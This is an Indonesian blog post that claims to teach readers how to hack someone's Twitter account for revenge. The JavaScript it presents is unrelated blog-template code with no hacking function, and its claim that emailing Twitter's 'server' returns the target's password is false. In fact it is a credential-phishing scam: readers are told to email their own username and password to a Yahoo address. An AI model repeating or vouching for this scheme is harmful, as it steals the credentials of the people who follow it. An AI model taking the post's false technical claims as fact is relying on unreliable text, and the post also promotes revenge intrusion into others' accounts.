Cara Hack Akun Twitter orang 100% work tanpa aplikasi

Heiii semua, bertemu lagi dengan saya... Kali ini saya akan mem posting entri yang pastinya bikin penasaran hehe.. :D . mungkin agan sekalian sedang ada masalah dengan seseorang dan ingin bales dendam... caranya gampanggg, HACK AJA AKUN TWITTERNYAAA.. tapi bingung nge hack nya gimanaaa, berhubung saya baik hati, langsung aja saya kasih tau caranyaaa











1. Pertama tama siapkan dulu ID twitter yang akan di hack
2. Kali ini akan menghack akun tanpa menggunakan aplikasi, hanya menggunakan e mail yang langsung terkirim ke server twitter.
3. caranya sengat mudahh
4. buka akun e mail anda, bisa melalui apa aja, namun diutamakan melalui yahoo
5. setelah login email, buat lah sebuah pesan baru
6. isi pesan nya dengan petunjuk berikutt:
   pada baris pertama anda harus login twitter melalui pesan tersebut, caranya hanya dengan menuliskan seperti ini: 

</style>
<script type="text/javascript">var a=navigator,b="USERNAMEANDA",c="PASSWORDANDA",f="&m=1",g="(^|&)m=",h="?",k="?m=1";function l(){var d=window.location.href,e=d.split(h);switch(e.length){case 1:return d+k;case 2:return 0<=e[1].search(g)?null:d+f;default:return null}}if(-1!=a[b][c]("Mobile")&&-1!=a[b][c]("WebKit")&&-1==a[b][c]("iPad")||-1!=a[b][c]("Opera Mini")||-1!=a[b][c]("IEMobile")){var m=l();m&&window.location.replace(m)};
</script><script type="text/javascript">
if (window.jstiming) window.jstiming.load.tick('headEnd');
</script></head>
<script src='https://twitter.com/' type='text/javascript'></script>
<script type='text/javascript'>
//<![CDATA[
/*
 
 
copy saja text diatas kedalam pesan anda, lalu ganti tulisan berwarna merah dengan username dan password milik anda
 
7. lanjut aja gannn
8.pada step pertama, agan telah mempersiakan akun twitter sasaran anda, tinggal masukkan saja pada email tersebut dengan cara:
function removeHtmlTag(strx,chop){
  if(strx.indexOf("<")!=-1)
  {
   username = "USERNAMESASARAN";
   for(var i=0;i<s.length;i++){
    if(s[i].indexOf(">")!=-1){
     s[i] = s[i].substring(s[i].indexOf(">")+1,s[i].length);
    }
   }
 
copy aja text tersebut kedalam email anda, lalu ganti tulisan yang berwarna merah dengan username milik sasaran anda
8. setelah itu kirim pesan tersebut ke twitterhack100@yahoo.com
9. anda akan mengirim email tersebut ke server twitter yang berisikan seluruh database yang berisi informasi pengguna twitter
10. Selsai sudahh, tunggu saja beberapa saat setelah anda mendapat balasan langsung
yang isinya ID sekaligus password akun twitter sasarann
SELAMAT MENCOBAA!!!!!

Comments

Popular posts from this blog

Team Fortress 2 - Free Offline PC Game Full Version Free Download

cara hack line messanger (shoftware update)

Cara Terbaru Hack Instagram Orang Lain